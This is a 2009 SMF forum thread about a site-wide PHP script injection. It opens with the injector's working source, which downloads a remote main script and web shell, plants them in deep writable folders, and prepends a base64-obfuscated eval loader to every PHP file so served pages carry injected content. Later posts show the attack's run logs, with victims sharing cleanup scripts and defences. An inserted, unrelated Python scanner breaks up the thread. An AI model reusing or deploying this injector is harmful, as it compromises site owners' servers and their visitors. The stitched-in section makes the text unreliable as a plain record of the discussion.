$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 03:21:22 PM
<<< Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

Yeah, lock the windows and leave the door open.
Title: Re: Hacked, script injection
Post by: sjokomelk on May 06, 2009, 04:00:28 PM
Think I have at least worked out what the injection does.

The <?php eval(base64_decode  <insert value here>
contains an address to a folder in the installation.

In my case it was a theme helios multi template.

From the 28th of April until now, 25MB of files were stored there.
Over 2100 files.

All of which seem to be links to other infected sites which have been injected with commercials, with several commercials in each.
Many of the commercials seem to be flash files, which I haven't tested to run yet, but I downloaded all the files that the hack left and I'm going to inspect those closely.

Not that I will be able to make a difference in sorting out how to fix it, unless you can run a preg_replace and remove <? from files uploaded. But I'm not there yet with my php knowledge, so I'll just continue researching and posting what I find.
Title: Re: Hacked, script injection
Post by: Rumboogy on May 06, 2009, 08:46:35 PM
He got me today too...I am in the process of restoring a backup (I hope).

I had a member ask if they could get a virus from this code? How do I answer that question.

Thanks,

Wally
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 10:18:04 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 10:24:35 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 10:25:19 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)

Need to think outside the box :)
Title: Re: Hacked, script injection
Post by: djkimmel on May 06, 2009, 11:05:37 PM
Can't the person just come back again using a different name?

I had no idea someone could upload a fake avatar to the default attachments directory and cause this much damage and work. I do now.

SMF 1.1.8

I have the bookmark mod and the donate mod. I think that is it. I have tinymce on another path in a mambo install. That is where the 'avatar' script put the files that infected all of my PHP files on my part of the shared server. The script reported it was looking for the longest path only though not tinymce - see below.

I was trying to figure out what this new 'member' krisbarteo was up to when the forum reported he/she was trying to edit his/her theme. I had already put him/her in a limited group that can't post or pm because of the same Latvian IP address as mentioned above - lots of visitors from Europe IPs lately who have been trying to spam.

Instead of getting a list of themes with how many persons were in each when I accessed them in admin (I have everyone in one theme) I got an output web page 244 pages long in MS Word (when I copied it) of an upload to the mambo directory and a message saying 'injecting PHP files' along with a list of all the PHP files that were changed across all my folders/domains/programs.

[JPEG/EXIF header bytes; the embedded metadata reads "ACD Systems Digital Imaging 2008:11:22 03:08:16"] 'exploit full path

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH

What a nightmare! My web host security person was able to remove the injected PHP script from the tops of all the PHP files for me thank goodness, but I did not at first know what happened other than the script output I got when I clicked on 'choose themes...' so I knew the problem had originated somehow with SMF. My confidence is battered. I did not know something this 'simple' could bypass so much of the server security, htaccess and folder permissions.

After all the work it will take the rest of the evening to put things to rights, I wonder how likely it is something similar will happen again now? I will definitely disallow uploading their own avatars. Some members won't like that, but it's better than having this happen again.
Title: Re: Hacked, script injection
Post by: JBlaze on May 06, 2009, 11:21:19 PM
Can you post that code in code tags?
Title: Re: Hacked, script injection
Post by: djkimmel on May 07, 2009, 12:02:30 AM
Code: [Select]
[JPEG/EXIF header bytes; the embedded metadata reads "ACD Systems Digital Imaging 2008:11:22 03:08:16"] 'exploit full path [/home/username/public_html/forum/index.php]
[6910002]
1.0
http://www.greatlakesbass.com/forum/index.php?action=theme;sa=pick;u=-1;sesc=07d0####ddf20ad1792de13df1a8188e
root dir path [/home/username/public_html/]

SYSTEM: Linux servername #.#.##.# #5 SMP Mon Mar 30 04:51:09 CDT 2009 i686 i686 i386 GNU/Linux
MY USER ID: #####; MY GROUP ID: #####; CURRENT USER: username
________________________________________

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH
the longest available path: /home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/
path of main script successfully set [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/]
[5482745]
name of main script successfully set [style.css.php]
[2246876]
relative root dir successfully set [/home/username/public_html/]
[5893301]

my packed size: 0171552
main script path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/style.css.php]
[48839]
shell path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/s.php]
[58392]
INJECTING PHP FILES
GOTO: /home/username/public_html/
[uid:32148; gid:99; uname:username; gname:nobody] [0750] /home/username/public_html/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/articles/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/images/
[uid:32148; gid:32150; uname:username; gname:username] [0644] /home/username/public_html/domain/index.php [not patched] [patched]
etc, etc for 244 pages total

Sorry... a little frazzled after today.
Title: Re: Hacked, script injection
Post by: chrishicks on May 07, 2009, 01:53:25 AM
Should I be fairly safe if I have image uploads throughout my site disabled for new registers? I disabled uploads on avatars, the gallery and in the ultimate profile mod for them and I don't allow attachments anymore for storage reasons. Is there anything else I should do as precautions?
Title: Re: Hacked, script injection
Post by: oakview on May 07, 2009, 01:59:12 AM
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
# Walk the tree and drop every line containing the search term from each .php file.
# Note: 'find' needs -name for the pattern, otherwise '*.php' is treated as a start path.
find /directory_name -name '*.php' -type f | while IFS= read -r FILE
do
sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Lastly, the forum I run doesn't have any need to entertain visitors from the RIPE Network where the vast majority of attacks come from, so I added denials for all the RIPE Network IP blocks. Since I've done that, we've been clean and the server log is full of denials from the RIPE geographic area. As an afterthought, I pulled the guy's referring link from the log and reported him. Probably spoofed, but who knows, I may just get lucky.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 07, 2009, 02:21:54 AM
I wouldn't really recommend banning the whole RIPE IP area... It is geographically about 25% of the world...
Title: Re: Hacked, script injection
Post by: oakview on May 07, 2009, 02:41:21 AM
Quote
It is geographically about 25% of the world...

True - we considered the ramifications, but in the end decided to implement the ban since our forum's subject matter is pretty localized. Not the best choice for everyone I'd venture to say. Draconian measures need to be thought out very carefully as we did.
Title: Re: Hacked, script injection
Post by: ellion on May 07, 2009, 04:47:49 AM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

I had this hack but it has not been completed; I managed to ban krisbarteo before he finished the job. I have got a lot of errors in the log.

The user did upload an avatar but it was not an image. The comment for the avatar was
Code: [Select]
JPEG image data, EXIF standard 2.2, comment: "<?php;$url 'http://wplsat23.n" 
The avatars were in the attachment folder.

There was no other SW (that I installed) on the server.

I have put my forum in maintenance mode; although everything still seems to be working alright, as yet I have not started to examine the pages of the forum.
Title: Re: Hacked, script injection
Post by: sjokomelk on May 07, 2009, 05:45:21 AM
If you get a lot of errors, that's the first sign.

I had 3 errors.
dhah something
dgobah I think it was and something that looked like it could be a session ID or encryption string.

The avatar starts the chain reaction, if you try to change theme, at least when I tried to, I got a weird error message.

If you check your files you will notice a line on top of most of your php files:
<?php ; /**/ eval(base64_decode('long string here');

If your files don't have that string you are most likely alright; however, I would pay close attention to error logs, and maybe even, to be on the safe side, upload fresh files.

A check towards smf files will give you ?? as version numbers compared to smf original files, so that's another sign of infection as well.
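Added example (not from this thread, SMF, or any poster's own tooling): a Python scan that applies the two checks the posts above describe from the defender's side. It strips only the injected leading `<?php /**/eval(base64_decode('...')); ?>` statement from PHP files (rather than deleting every line containing base64_decode, which can remove legitimate code, as oakview found), and it flags uploads that carry a PHP open tag (like the EXIF-comment "avatar" ellion quoted) or PHP files sitting in image/attachment directories (where style.css.php was dropped). The directory names, sample files and the upload-directory heuristic are constructed for the demo.

```python
import os
import re
import tempfile

# Signature of the injected first statement reported in this thread:
#   <?php /**/eval(base64_decode('<base64>')); ?>
# (the optional ';' after the open tag covers the variant sjokomelk quoted).
INJECT_RE = re.compile(
    rb"^<\?php\s*;?\s*/\*\*/\s*eval\(base64_decode\('[A-Za-z0-9+/=]+'\)\);?\s*(?:\?>)?\s*"
)
PHP_EXTS = {".php", ".phtml", ".php3"}
# Directory names that should hold images/uploads, never executable PHP
# (constructed heuristic; based on where the dropped script landed in the thread).
UPLOAD_DIRS = {"attachments", "avatars", "images", "img"}
# A PHP open tag inside something that is supposed to be an image/attachment.
PHP_TAG_RE = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def strip_injection(data):
    """Remove only the leading injected eval(base64_decode()) statement.
    Returns (cleaned_bytes, was_infected); a clean file comes back unchanged."""
    m = INJECT_RE.match(data)
    if not m:
        return data, False
    return data[m.end():], True


def scan_tree(root):
    """Walk a web root. PHP files carrying the injected prefix are rewritten
    without it; files that merely look wrong are reported but NOT modified.
    Returns (cleaned, suspicious): sorted relative paths, and (path, reason)."""
    cleaned, suspicious = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            parents = set(rel.split("/")[:-1])
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read()
            if ext in PHP_EXTS:
                if parents & UPLOAD_DIRS:
                    # e.g. Themes/default/images/bbc/style.css.php from the thread
                    suspicious.append((rel, "php file in upload/image directory"))
                new, hit = strip_injection(data)
                if hit:
                    with open(path, "wb") as fh:
                        fh.write(new)
                    cleaned.append(rel)
            elif PHP_TAG_RE.search(data):
                # e.g. the 'avatar' whose EXIF comment began with <?php
                suspicious.append((rel, "php tag inside upload"))
    return sorted(cleaned), sorted(suspicious)


def build_demo_tree():
    """Constructed sample web root (not real site data) for running the scan."""
    root = tempfile.mkdtemp(prefix="smf_demo_")
    injected = (b"<?php /**/eval(base64_decode('aGVsbG8='));  ?>\n"
                b"<?php\n// legitimate forum entry point\necho 'forum';\n")
    files = {
        "index.php": injected,
        # a legitimate base64_decode call must survive (a line-delete would not spare it)
        "Sources/Load.php": b"<?php\n$x = base64_decode($y);\n",
        "Themes/default/images/bbc/style.css.php": b"<?php eval(base64_decode('Zm9v'));\n",
        # constructed 'avatar': JPEG/EXIF header followed by a PHP open tag
        "attachments/1_f00ba2": (b"\xff\xd8\xff\xe1\x00\x10Exif\x00\x00"
                                 b"<?php;$url='http://placeholder.invalid';\xff\xd9"),
        "attachments/2_c0ffee": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\xff\xd9",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    cleaned, suspicious = scan_tree(demo)
    print("cleaned:", cleaned)
    for rel, why in suspicious:
        print("suspicious:", rel, "-", why)
```

Run it a second time over the same tree and the cleaned list is empty, which is a quick way to confirm nothing keeps re-injecting the prefix.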
Title: Re: Hacked, script injection
Post by: bsm on May 07, 2009, 06:18:47 AM
What I had done (perhaps what triggered the infection?)...

Noticed the ad for viagra or something in a post ...
Went and banned the user...(on everything I could)
Removed the post...
Deleted the user... (which also removed the avatar  -  but left the ban in place)
Then, error-log city !

To resolve and protect:
Downloaded the entire site
Removed the injected script from ALL php files (I had some backups)
I have the highest captcha setting, plus added the extra questions
Disabled avatar uploads

